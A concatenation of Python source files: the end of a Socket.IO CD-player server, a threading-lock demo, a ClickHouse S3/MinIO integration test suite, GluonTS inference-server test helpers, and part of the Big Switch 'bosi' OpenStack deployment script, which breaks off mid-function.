@app.route('/getMediaPlayerInfo')
def info():
return config['NAME']
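# Register the same handler for both the 'connect' and 'reconnect' Socket.IO events;
# the decorator inside the loop binds ws_connect to each event name in turn.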
for event in ['connect', 'reconnect']:
@socket.on(event)
def ws_connect():
emit('status', 'connected')
socket.emit('media_player_info', media_player.get_current_info(True, True, True, True, True).as_dict())
sleep(1)
socket.emit('media_player_info', media_player.get_current_info().as_dict())
print('connected')
@socket.on('disconnect')
def ws_disconnect():
print('disconnected')
@socket.on('getCurTrackInfo')
def ws_get_current_track_info():
socket.emit('media_player_info', media_player.get_current_info(True, True, True, True, True).as_dict())
@socket.on('playFile')
def ws_play_file(data):
media_library_type = None
if data['mediaLibraryType'] == 'artists':
media_library_type = MediaPlayer.BranchType.ARTISTS
elif data['mediaLibraryType'] == 'albums':
media_library_type = MediaPlayer.BranchType.ALBUMS
elif data['mediaLibraryType'] == 'folders':
media_library_type = MediaPlayer.BranchType.FOLDERS
media_player.play_file(media_library_type, data['indexes'])
@socket.on('playFolder')
def ws_play_folder(data):
media_player.play_file(MediaPlayer.BranchType.FOLDERS, (data['folderIndex'], None, None, 0))
@socket.on('playArtist')
def ws_play_artist(data):
media_player.play_file(MediaPlayer.BranchType.ARTISTS, (None, data['artistIndex'], None, 0))
@socket.on('playAlbum')
def ws_play_album(data):
media_player.play_file(MediaPlayer.BranchType.ALBUMS, (None, data['artistIndex'], data['albumIndex'], 0))
@socket.on('playTrack')
def ws_play_track(data):
media_player.play_track(data['trackNumber'])
@socket.on('prevBranch')
def ws_prev_branch():
media_player.prev_branch()
@socket.on('nextBranch')
def ws_next_branch():
media_player.next_branch()
@socket.on('prevTrack')
def ws_prev_track():
media_player.prev_track()
@socket.on('nextTrack')
def ws_next_track():
media_player.next_track()
@socket.on('volumeUp')
def ws_volume_up():
media_player.volume_up()
@socket.on('volumeDown')
def ws_volume_down():
media_player.volume_down()
@socket.on('play')
def ws_play():
media_player.play_pause()
@socket.on('pause')
def ws_pause():
media_player.play_pause()
@socket.on('eject')
def ws_eject():
cad.destroy()
media_player.stop()
@socket.on('seek')
def ws_seek(data):
media_player.seek(data['seekPercent'])
# Web server thread starting point
def start_web_server():
"""
Starts web server
:return: None
"""
if __name__ == '__main__':
socket.run(app, config['WEB_IP'],
port=config['WEB_PORT'])
# Start web server thread
web_server_thread = Thread(target=start_web_server, args=[])
web_server_thread.daemon = True
web_server_thread.start()
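# Try to play an inserted CD: drive the PiFace CAD display (when present) and push
# playback status updates to any connected web clients while the player is running.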
def play_cd(media_player, cad):
media_player.try_play_cd()
if media_player.is_running:
if cad is not None:
cad.init(media_player)
while media_player.is_running:
for info in iter(media_player.poll_info, None):
print(info.as_dict())
socket.emit('media_player_info', info.as_dict())
sleep(0.2)
if cad is not None:
cad.destroy()
socket.emit('media_player_info', media_player.get_current_info().as_dict())
# Eject button
if cad is not None:
eject_listener = MediaPlayerPiFaceCAD.create_eject_listener(media_player)
play_cd(media_player, cad)
# watch udev for block device changes (including CD insertion)
udev_context = pyudev.Context()
udev_monitor = pyudev.Monitor.from_netlink(udev_context)
udev_monitor.filter_by(subsystem='block')
for device in iter(udev_monitor.poll, None):
if device.action == 'change' or device.action == 'add':
sleep(1)
play_cd(media_player, cad)
|
t3.py
|
import threading
# global variable x
x = 0
def plus():
global x
x += 1
def thread_task(lock):
for _ in range(100000):
lock.acquire()
plus()
lock.release()
def main_task():
global x
x = 0
# creating a lock
lock = threading.Lock()
# creating threads
t1 = threading.Thread(target=thread_task, args=(lock,))
t2 = threading.Thread(target=thread_task, args=(lock,))
# start threads
t1.start()
t2.start()
# wait until threads finish their job
t1.join()
t2.join()
if __name__ == "__main__":
for i in range(10):
main_task()
print("Iteration {0}: x = {1}".format(i,x))
|
test.py
|
import json
import logging
import random
import threading
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance
import helpers.client
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = cluster.minio_client
minio_client.set_bucket_policy(cluster.minio_bucket, json.dumps(bucket_read_write_policy))
cluster.minio_restricted_bucket = "{}-with-auth".format(cluster.minio_bucket)
if minio_client.bucket_exists(cluster.minio_restricted_bucket):
minio_client.remove_bucket(cluster.minio_restricted_bucket)
minio_client.make_bucket(cluster.minio_restricted_bucket)
# Returns content of given S3 file as string.
def get_s3_file_content(cluster, bucket, filename):
# type: (ClickHouseCluster, str) -> str
data = cluster.minio_client.get_object(bucket, filename)
data_str = ""
for chunk in data.stream():
data_str += chunk
return data_str
# Returns nginx access log lines.
def get_nginx_access_logs():
handle = open("/nginx/access.log", "r")
data = handle.readlines()
handle.close()
return data
@pytest.fixture(scope="module")
def cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"], with_minio=True)
cluster.add_instance("dummy", with_minio=True)
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
# Test simple put.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
("'minio','minio123',", True),
("'wrongid','wrongkey',", False)
])
def test_put(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, filename, maybe_auth, table_format, values)
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(cluster, bucket, filename)
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
("'minio','minio123',", True),
("'wrongid','wrongkey',", False)
])
def test_put_csv(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
cluster.minio_host, cluster.minio_port, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(cluster):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
def test_put_get_with_globs(cluster):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}_{}/{}.csv".format(i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i+j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
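# The expected values in the assertion above follow from the inserted rows: for i, j in
# 0..9, sum(column1) = sum(column2) = 10 * (0 + 1 + ... + 9) = 450 and
# sum(column3) = sum(i + j) = 900, while "0.csv" is the smallest _file and max_path is
# the lexicographically largest _path generated in the loop.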
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
("'wrongid','wrongkey',", False)
])
def test_multipart_put(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
# Minimum size of part is 5 Mb for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
int_data = [[1, 2, 3] for i in range(csv_size_bytes / one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use Nginx access logs to count number of parts uploaded to Minio.
nginx_logs = get_nginx_access_logs()
uploaded_parts = filter(lambda log_line: log_line.find(filename) >= 0 and log_line.find("PUT") >= 0, nginx_logs)
assert len(uploaded_parts) > 1
assert csv_data == get_s3_file_content(cluster, bucket, filename)
def test_remote_host_filter(cluster):
instance = cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", cluster.minio_port, cluster.minio_bucket, format)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
"invalid_host", cluster.minio_port, cluster.minio_bucket, format, other_values)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
@pytest.mark.parametrize("s3_storage_args", [
"''", # 1 arguments
"'','','','','',''" # 6 arguments
])
def test_wrong_s3_syntax(cluster, s3_storage_args):
instance = cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3({})".format(s3_storage_args)
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(cluster):
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night+nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
|
shell.py
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
# Standard library imports
import json
import socket
import tempfile
import time
from contextlib import closing, contextmanager
from multiprocessing import Process
from pathlib import Path
from typing import Any, ContextManager, Dict, Optional, Type, Iterable, List
import requests
# First-party imports
from gluonts.dataset.common import DataEntry, serialize_data_entry
from gluonts.dataset.repository.datasets import materialize_dataset
from gluonts.model.predictor import Predictor
from gluonts.shell.sagemaker import ServeEnv, ServePaths, TrainEnv, TrainPaths
from gluonts.shell.sagemaker.params import encode_sagemaker_parameters
from gluonts.shell.serve import Settings, make_gunicorn_app
class ServerFacade:
"""
A convenience wrapper for sending requests and handling responses to
an inference server located at the given address.
"""
def __init__(self, base_address: str) -> None:
self.base_address = base_address
def url(self, path) -> str:
return self.base_address + path
def ping(self) -> bool:
try:
response = requests.get(url=self.url("/ping"))
return response.status_code == 200
except requests.exceptions.ConnectionError:
return False
def execution_parameters(self) -> dict:
response = requests.get(
url=self.url("/execution-parameters"),
headers={"Accept": "application/json"},
)
if response.status_code == 200:
return response.json()
elif response.status_code >= 400:
raise RuntimeError(response.content.decode("utf-8"))
else:
raise RuntimeError(f"Unexpected {response.status_code} response")
def invocations(
self, data_entries: Iterable[DataEntry], configuration: dict
) -> List[dict]:
instances = list(map(serialize_data_entry, data_entries))
response = requests.post(
url=self.url("/invocations"),
json={"instances": instances, "configuration": configuration},
headers={"Accept": "application/json"},
)
if response.status_code == 200:
predictions = response.json()["predictions"]
assert len(predictions) == len(instances)
return predictions
elif response.status_code >= 400:
raise RuntimeError(response.content.decode("utf-8"))
else:
raise RuntimeError(f"Unexpected {response.status_code} response")
def batch_invocations(
self, data_entries: Iterable[DataEntry]
) -> List[dict]:
instances = map(serialize_data_entry, data_entries)
instances = list(map(json.dumps, instances))
response = requests.post(
url=self.url("/invocations"), data="\n".join(instances)
)
assert response.status_code == 200
predictions = list(map(json.loads, response.text.splitlines()))
assert len(predictions) == len(instances)
return predictions
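# free_port() below relies on binding to port 0, which asks the OS to hand out an
# ephemeral port; the socket is closed right away, so there is a small window in which
# another process could grab the port before the test server binds it.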
def free_port() -> int:
"""Returns a random unbound port."""
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.bind(("", 0))
return sock.getsockname()[1]
@contextmanager # type: ignore
def temporary_server(
env: ServeEnv,
forecaster_type: Optional[Type[Predictor]],
settings: Settings = Settings(),
) -> ContextManager[ServerFacade]:
"""
A context manager that instantiates a Gunicorn inference server in a
separate process (using the :func:`make_gunicorn_app` call).
Parameters
----------
env
The :class:`ServeEnv` to use in static inference mode.
Either `env` or `forecaster_type` must be set.
forecaster_type
The :class:`Predictor` type to use in dynamic inference mode.
Either `env` or `forecaster_type` must be set.
settings
Settings to use when instantiating the Gunicorn server.
Returns
-------
ContextManager[ServerFacade]
A context manager that yields the :class:`ServerFacade` instance
wrapping the spawned inference server.
"""
gunicorn_app = make_gunicorn_app(env, forecaster_type, settings)
process = Process(target=gunicorn_app.run)
process.start()
endpoint = ServerFacade(
base_address="http://{address}:{port}".format(
address=settings.sagemaker_server_address,
port=settings.sagemaker_server_port,
)
)
# try to ping the server (signalling liveness)
# poll for n seconds in t second intervals
n, t = 10, 2
max_time = time.time() + n
while not endpoint.ping():
if time.time() < max_time:
time.sleep(t)
else:
msg = f"Failed to start the inference server within {n} seconds"
raise TimeoutError(msg)
yield endpoint
process.terminate()
process.join()
@contextmanager # type: ignore
def temporary_train_env(
hyperparameters: Dict[str, Any], dataset_name: str
) -> ContextManager[TrainEnv]:
"""
A context manager that instantiates a training environment from a given
combination of `hyperparameters` and `dataset_name` in a temporary
directory and removes the directory on exit.
Parameters
----------
hyperparameters
The hyperparameters to use when instantiating the training
environment.
dataset_name
The name of the repository dataset to use when instantiating the
training environment.
Returns
-------
ContextManager[TrainEnv]
A context manager that yields the :class:`TrainEnv` instance.
"""
with tempfile.TemporaryDirectory(prefix="gluonts-train-env") as base:
paths = TrainPaths(base=Path(base))
# write hyperparameters
with paths.hyperparameters.open(mode="w") as fp:
hps_encoded = encode_sagemaker_parameters(hyperparameters)
json.dump(hps_encoded, fp, indent=2, sort_keys=True)
# save dataset
ds_path = materialize_dataset(dataset_name)
path_metadata = paths.data / "metadata" / "metadata.json"
path_train = paths.data / "train"
path_test = paths.data / "test"
path_metadata.parent.mkdir(exist_ok=True)
path_metadata.symlink_to(ds_path / "metadata.json")
path_train.symlink_to(ds_path / "train", target_is_directory=True)
path_test.symlink_to(ds_path / "test", target_is_directory=True)
yield TrainEnv(path=paths.base)
@contextmanager # type: ignore
def temporary_serve_env(predictor: Predictor) -> ContextManager[ServeEnv]:
"""
A context manager that instantiates a serve environment for a given
:class:`Predictor` in a temporary directory and removes the directory on
exit.
Parameters
----------
predictor
A predictor to serialize in :class:`ServeEnv` `model` folder.
Returns
-------
ContextManager[ServeEnv]
A context manager that yields the :class:`ServeEnv` instance.
"""
with tempfile.TemporaryDirectory(prefix="gluonts-serve-env") as base:
paths = ServePaths(base=Path(base))
# serialize model
predictor.serialize(paths.model)
yield ServeEnv(path=paths.base)
|
bosi.py
|
# Copyright 2018 Big Switch Networks, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import datetime
import lib.constants as const
import os
import Queue
import random
import subprocess32 as subprocess
import threading
import time
import yaml
from collections import OrderedDict
from lib.environment import Environment
from lib.helper import Helper
from lib.util import safe_print
# queue to store all controller nodes
controller_node_q = Queue.Queue()
# queue to store all nodes
node_q = Queue.Queue()
# copy the node_q to this when original list is created
certify_node_q = Queue.Queue()
verify_node_q = Queue.Queue()
support_node_q = Queue.Queue()
# keep track of verified nodes
node_pass = {}
node_fail = {}
# result dict
node_dict = {}
time_dict = {}
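# Worker thread body: pull nodes off the queue, push the packages and the generated
# per-role script to each node, run the script remotely and record how long it took.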
def worker_upgrade_or_sriov_node(q):
while True:
node = q.get()
# copy ivs pkg to node
Helper.copy_pkg_scripts_to_remote(node)
# deploy node
safe_print("Start to deploy %(fqdn)s\n" %
{'fqdn': node.fqdn})
start_time = datetime.datetime.now()
if node.role == const.ROLE_SRIOV:
Helper.run_command_on_remote(node,
(r'''sudo bash %(dst_dir)s/%(hostname)s_sriov.sh''' %
{'dst_dir': node.dst_dir,
'hostname': node.hostname,
'log': node.log}))
elif node.role in const.DPDK_ROLES:
Helper.run_command_on_remote(node,
(r'''sudo bash %(dst_dir)s/%(hostname)s_dpdk.sh''' %
{'dst_dir': node.dst_dir,
'hostname': node.hostname,
'log': node.log}))
else:
Helper.run_command_on_remote(node,
(r'''sudo bash %(dst_dir)s/%(hostname)s_upgrade.sh''' %
{'dst_dir': node.dst_dir,
'hostname': node.hostname,
'log': node.log}))
end_time = datetime.datetime.now()
# parse setup log
diff = Helper.timedelta_total_seconds(end_time - start_time)
node.set_time_diff(diff)
node = Helper.update_last_log(node)
node_dict[node.fqdn] = node
time_dict[node.fqdn] = diff
safe_print("Finish executing script for node %(fqdn)s, "
"cost time: %(diff).2f\n" %
{'fqdn': node.fqdn, 'diff': node.time_diff})
q.task_done()
def worker_setup_node(q):
while True:
node = q.get()
# copy ivs pkg to node
Helper.copy_pkg_scripts_to_remote(node)
# deploy node
safe_print("Start to deploy %(fqdn)s\n" %
{'fqdn': node.fqdn})
if node.cleanup and node.role == const.ROLE_NEUTRON_SERVER:
Helper.run_command_on_remote(node,
(r'''sudo bash %(dst_dir)s/%(hostname)s_ospurge.sh''' %
{'dst_dir': node.dst_dir,
'hostname': node.hostname,
'log': node.log}))
# add a random delay to spread out concurrent apt-get/yum load
delay = random.random() * 10.0
time.sleep(delay)
start_time = datetime.datetime.now()
Helper.run_command_on_remote(node,
(r'''sudo bash %(dst_dir)s/%(hostname)s.sh''' %
{'dst_dir': node.dst_dir,
'hostname': node.hostname,
'log': node.log}))
end_time = datetime.datetime.now()
# parse setup log
diff = Helper.timedelta_total_seconds(end_time - start_time)
node.set_time_diff(diff)
node = Helper.update_last_log(node)
node_dict[node.fqdn] = node
time_dict[node.fqdn] = diff
# when deploying T5 on UBUNTU, reboot compute nodes
Helper.reboot_if_necessary(node)
safe_print("Finish deploying %(fqdn)s, cost time: %(diff).2f\n" %
{'fqdn': node.fqdn, 'diff': node.time_diff})
q.task_done()
def certify_node_setup(q):
while True:
node = q.get()
if node.certificate_dir:
if not os.path.isfile("%s/ca.cert" % node.certificate_dir):
safe_print("Missing ca.cert in %s\n" % node.certificate_dir)
break
Helper.certify_node(node)
q.task_done()
def support_node_setup(q):
while True:
node = q.get()
Helper.support_node(node)
q.task_done()
def verify_node_setup(q):
while True:
node = q.get()
all_service_status = 'Service status for node: ' + node.fqdn
# check services are running and IVS version is correct
if node.deploy_dhcp_agent:
dhcp_status = Helper.check_os_service_status(
node, "neutron-dhcp-agent")
all_service_status = (all_service_status +
' | DHCP Agent ' + dhcp_status)
metadata_status = Helper.check_os_service_status(
node, "neutron-metadata-agent")
all_service_status = (all_service_status +
' | Metadata Agent ' + metadata_status)
if node.deploy_l3_agent and node.deploy_mode == const.T5:
l3_status = Helper.check_os_service_status(
node, "neutron-l3-agent")
all_service_status = (all_service_status +
' | L3 Agent ' + l3_status)
# for T5 deployment, check LLDP service status on compute nodes
if node.deploy_mode == const.T5 and node.role != const.ROLE_NEUTRON_SERVER:
lldp_status = Helper.check_os_service_status(node, "send_lldp")
all_service_status = (all_service_status +
' | LLDP Service ' + lldp_status)
# for T6 deployment, check IVS status and version too
if node.deploy_mode == const.T6:
# check ivs status and version
ivs_status = Helper.check_os_service_status(node, "ivs")
if ivs_status == ':-)':
# ivs is OK. check version
ivs_version = Helper.check_ivs_version(node)
all_service_status = (all_service_status +
' | IVS version ' + ivs_version)
else:
# ivs not OK
all_service_status = (all_service_status +
' | IVS ' + ivs_status)
# check neutron-bsn-agent status
bsn_agent_status = Helper.check_os_service_status(
node, "neutron-bsn-agent")
all_service_status = (all_service_status +
' | BSN Agent ' + bsn_agent_status)
# after forming the complete string, put it in the respective list
if ":-(" not in all_service_status:
node_pass[node.fqdn] = all_service_status
else:
node_fail[node.fqdn] = all_service_status
q.task_done()
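# upgrade_bcf generates per-node upgrade scripts, fans the nodes out to a pool of
# worker threads, and reports per-node execution times once the queue drains.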
def upgrade_bcf(node_dic):
for hostname, node in node_dic.iteritems():
if node.skip:
safe_print("skip node %(fqdn)s due to %(error)s\n" %
{'fqdn': node.fqdn, 'error': node.error})
continue
if node.tag != node.env_tag:
safe_print("skip node %(fqdn)s due to mismatched tag\n" %
{'fqdn': node.fqdn})
continue
if node.os == const.CENTOS:
Helper.generate_upgrade_scripts_for_centos(node)
elif node.os == const.UBUNTU:
Helper.generate_upgrade_scripts_for_ubuntu(node)
elif node.os == const.REDHAT:
Helper.generate_upgrade_scripts_for_redhat(node)
node_q.put(node)
with open(const.LOG_FILE, "a") as log_file:
for hostname, node in node_dic.iteritems():
log_file.write(str(node))
# Use multiple threads to setup compute nodes
for i in range(const.MAX_WORKERS):
t = threading.Thread(target=worker_upgrade_or_sriov_node, args=(node_q,))
t.daemon = True
t.start()
node_q.join()
sorted_time_dict = OrderedDict(sorted(time_dict.items(),
key=lambda x: x[1]))
for fqdn, h_time in sorted_time_dict.items():
safe_print("node: %(fqdn)s, time: %(time).2f\n" %
{'fqdn': fqdn, 'time': h_time})
safe_print("Big Cloud Fabric deployment finished! "
"Check %(log)s on each node for details.\n" %
{'log': const.LOG_FILE})
def setup_sriov(node_dic):
for hostname, node in node_dic.iteritems():
if node.skip:
safe_print("skip node %(fqdn)s due to %(error)s\n" %
{'fqdn': node.fqdn, 'error': node.error})
continue
if node.tag != node.env_tag:
safe_print("skip node %(fqdn)s due to mismatched tag\n" %
{'fqdn': node.fqdn})
continue
if node.role != const.ROLE_SRIOV:
safe_print("Skipping node %(hostname)s because deployment mode is "
"SRIOV and role set for node is not SRIOV. It is "
"%(role)s\n" %
{'hostname': hostname, 'role': node.role})
continue
if node.os != const.REDHAT:
safe_print("Skipping node %(hostname)s because deployment mode is "
"SRIOV and non REDHAT OS is not supported. OS set for "
"node is %(os)s\n" %
{'hostname': hostname, 'os': node.os})
continue
# all okay, generate scripts for node
Helper.generate_sriov_scripts_for_redhat(node)
node_q.put(node)
with open(const.LOG_FILE, "a") as log_file:
for hostname, node in node_dic.iteritems():
log_file.write(str(node))
# Use multiple threads to setup nodes
for i in range(const.MAX_WORKERS):
t = threading.Thread(target=worker_upgrade_or_sriov_node, args=(node_q,))
t.daemon = True
t.start()
node_q.join()
sorted_time_dict = OrderedDict(sorted(time_dict.items(),
key=lambda x: x[1]))
for fqdn, h_time in sorted_time_dict.items():
safe_print("node: %(fqdn)s, time: %(time).2f\n" %
{'fqdn': fqdn, 'time': h_time})
safe_print("Big Cloud Fabric deployment finished! "
"Check %(log)s on each node for details.\n" %
{'log': const.LOG_FILE})
def setup_dpdk(node_dic):
for hostname, node in node_dic.iteritems():
if node.skip:
safe_print("skip node %(fqdn)s due to %(error)s\n" %
{'fqdn': node.fqdn, 'error': node.error})
continue
if node.tag != node.env_tag:
safe_print("skip node %(fqdn)s due to mismatched tag\n" %
{'fqdn': node.fqdn})
continue
if node.role not in const.DPDK_ROLES:
safe_print("Skipping node %(hostname)s because deployment mode is "
"DPDK and role set for node is not DPDK. It is "
"%(role)s\n" %
{'hostname': hostname, 'role': node.role})
continue
if node.os != const.REDHAT:
safe_print("Skipping node %(hostname)s because deployment mode is "
"DPDK and non REDHAT OS is not supported. OS set for "
"node is %(os)s\n" %
{'hostname': hostname, 'os': node.os})
continue
# all okay, generate scripts for node
Helper.generate_dpdk_scripts_for_redhat(node)
node_q.put(node)
with open(const.LOG_FILE, "a") as log_file:
for hostname, node in node_dic.iteritems():
log_file.write(str(node))
# Use multiple threads to setup nodes
for i in range(const.MAX_WORKERS):
t = threading.Thread(target=worker_upgrade_or_sriov_node, args=(node_q,))
t.daemon = True
t.start()
node_q.join()
sorted_time_dict = OrderedDict(sorted(time_dict.items(),
key=lambda x: x[1]))
for fqdn, h_time in sorted_time_dict.items():
safe_print("node: %(fqdn)s, time: %(time).2f\n" %
{'fqdn': fqdn, 'time': h_time})
safe_print("Big Cloud Fabric deployment finished! "
"Check %(log)s on each node for details.\n" %
{'log': const.LOG_FILE})
def deploy_bcf(config, mode, fuel_cluster_id, rhosp, tag, cleanup,
verify, verify_only, skip_ivs_version_check,
certificate_dir, certificate_only, generate_csr,
support, upgrade_dir, offline_dir, sriov, dpdk):
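    # upgrade_dir, sriov and dpdk each short-circuit into their dedicated
    # flows below; everything else takes the full deployment path: prepare
    # the setup node, load node info, generate per-node scripts, then run
    # the controller and compute workers.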
# Deploy setup node
safe_print("Start to prepare setup node\n")
env = Environment(config, mode, fuel_cluster_id, rhosp, tag, cleanup,
skip_ivs_version_check, certificate_dir, upgrade_dir,
offline_dir, sriov, dpdk)
Helper.common_setup_node_preparation(env)
controller_nodes = []
# Generate detailed node information
safe_print("Start to setup Big Cloud Fabric\n")
nodes_yaml_config = config['nodes'] if 'nodes' in config else None
node_dic = Helper.load_nodes(nodes_yaml_config, env)
if upgrade_dir:
return upgrade_bcf(node_dic)
if sriov:
return setup_sriov(node_dic)
if dpdk:
return setup_dpdk(node_dic)
if generate_csr:
safe_print("Start to generate csr for virtual switches.\n")
# create ~/csr and ~/key directory
Helper.run_command_on_local("mkdir -p %s" % const.CSR_DIR)
Helper.run_command_on_local("mkdir -p %s" % const.KEY_DIR)
